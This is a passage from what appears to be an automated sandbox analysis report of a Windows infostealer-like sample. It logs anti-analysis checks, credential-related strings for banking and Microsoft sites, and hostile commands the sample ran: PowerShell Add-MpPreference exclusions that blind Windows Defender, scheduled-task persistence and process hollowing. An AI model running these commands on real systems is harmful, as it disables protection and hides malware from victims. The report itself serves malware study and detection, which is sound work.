                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: 1050000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: 2CE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: 4CE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: 91D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: A1D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: A3E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: B3E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: BA00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: CA00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: DA00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: EA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: 2A80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: 28C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: E50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: 2980000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: 2780000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: 8A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: 9A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: 9C00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: AC00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: B000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: C000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: D000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: 18C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: 3300000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory allocated: 3130000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4462
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5415
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Window / User API: threadDelayed 3460
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Window / User API: threadDelayed 3030
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Window / User API: threadDelayed 631
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Window / User API: threadDelayed 5428
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe TID: 3748 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5672 Thread sleep count: 4462 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4084 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1088 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6288 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6488 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe TID: 7440 Thread sleep time: -24903104499507879s >= -30000s
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe TID: 5720 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe TID: 2948 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe TID: 7324 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe TID: 7852 Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe TID: 7768 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe TID: 7644 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: tmp3B70.tmp.17.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: tmp3B70.tmp.17.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: tmp3B70.tmp.17.dr Binary or memory string: discord.comVMware20,11696487552f
                    Source: tmp3B70.tmp.17.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: tmp3B70.tmp.17.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: tmp3B70.tmp.17.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: tmp3B70.tmp.17.dr Binary or memory string: global block list test formVMware20,11696487552
                    Source: tmp3B70.tmp.17.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                    Source: VcihjWRO.exe, 00000011.00000002.2424162856.00000000016CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzzv
                    Source: tmp3B70.tmp.17.dr Binary or memory string: AMC password management pageVMware20,11696487552
                    Source: tmp3B70.tmp.17.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2323363497.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmp3B70.tmp.17.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: tmp3B70.tmp.17.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: tmp3B70.tmp.17.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: tmp3B70.tmp.17.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: tmp3B70.tmp.17.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: tmp3B70.tmp.17.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: tmp3B70.tmp.17.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: tmp3B70.tmp.17.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: tmp3B70.tmp.17.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: tmp3B70.tmp.17.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Memory written: C:\Users\user\AppData\Roaming\VcihjWRO.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Process created: C:\Users\user\Desktop\I5pvP0CU6M.exe "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe Process created: C:\Users\user\AppData\Roaming\VcihjWRO.exe "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Queries volume information: C:\Users\user\Desktop\I5pvP0CU6M.exe VolumeInformation
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Users\user\Desktop\I5pvP0CU6M.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
